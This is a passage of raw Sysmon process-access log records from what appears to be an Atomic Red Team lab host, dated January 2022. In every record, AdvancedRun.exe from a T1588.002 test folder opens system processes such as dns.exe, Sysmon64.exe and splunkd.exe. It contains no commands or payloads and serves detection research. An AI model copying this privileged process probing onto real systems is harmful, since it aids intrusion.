17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983969Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983968Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3E00-000000002702}3416C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983967Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983966Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3C00-000000002702}2860C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983965Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983964Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3B00-000000002702}2688C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983963Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3A00-000000002702}2668C:\Windows\System32\smbhash.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983962Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983961Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3900-000000002702}2664C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983960Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3800-000000002702}2272C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983959Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983958Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3700-000000002702}1932C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983957Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983956Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3500-000000002702}1832C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003983954Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.350{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3400-000000002702}2460C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+25ac|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983953Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 